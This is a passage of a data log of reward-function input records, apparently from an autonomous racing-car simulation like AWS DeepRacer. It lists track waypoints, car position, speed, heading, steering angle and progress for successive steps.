(7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.113037208643439, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9581620420269243, 'all_wheels_on_track': True, 'distance_from_center': 2.42061961851892e-05, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096329005125809, 'object_in_camera': False, 'heading': -0.20270984620429464, 'objects_speed': [], 'progress': 0.7156522898480779, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 1.0},
{'is_left_of_center': False, 'projection_distance': 0.14390030350019378, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1170200743079786, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9558374100872313, 'all_wheels_on_track': True, 'distance_from_center': 0.0023336167208049628, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096318089179309, 'object_in_camera': False, 'heading': -0.825491610728565, 'objects_speed': [], 'progress': 0.7360704569032253, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 2.0},
{'is_left_of_center': False, 'projection_distance': 0.15196206004735874, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.125078911758613, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.955057360318226, 'all_wheels_on_track': True, 'distance_from_center': 0.0030828964229950976, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096296043067686, 'object_in_camera': False, 'heading': -0.9884467304532386, 'objects_speed': [], 'progress': 0.7773074847674944, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 3.0},
{'is_left_of_center': False, 'projection_distance': 0.16912750229283322, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1422415816125593, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9542983635625084, 'all_wheels_on_track': True, 'distance_from_center': 0.0037763696438425478, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096249101529135, 'object_in_camera': False, 'heading': -1.144017253009116, 'objects_speed': [], 'progress': 0.8651111558456122, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 4.0},
{'is_left_of_center': False, 'projection_distance': 0.20191403063825683, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.175030705920951, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9531424221266476, 'all_wheels_on_track': True, 'distance_from_center': 0.004816122658064441, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096159441726402, 'object_in_camera': False, 'heading': -1.274013521940257, 'objects_speed': [], 'progress': 1.0328188973338295, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 5.0},
{'is_left_of_center': False, 'projection_distance': 0.23782031815517216, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2109317593475533, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9509277885376232, 'all_wheels_on_track': True, 'distance_from_center': 0.006944210021401, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096061250441126, 'object_in_camera': False, 'heading': -1.6277243413174938, 'objects_speed': [], 'progress': 1.216484649353865, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 6.0},
{'is_left_of_center': False, 'projection_distance': 0.3043395330840337, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), 
(7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), 
(1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2774576092278784, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.953600119077487, 'all_wheels_on_track': True, 'distance_from_center': 0.00411152612414604, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095879343380803, 'object_in_camera': False, 'heading': -0.5769436778572566, 'objects_speed': [], 'progress': 1.5567398658792773, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 7.0},
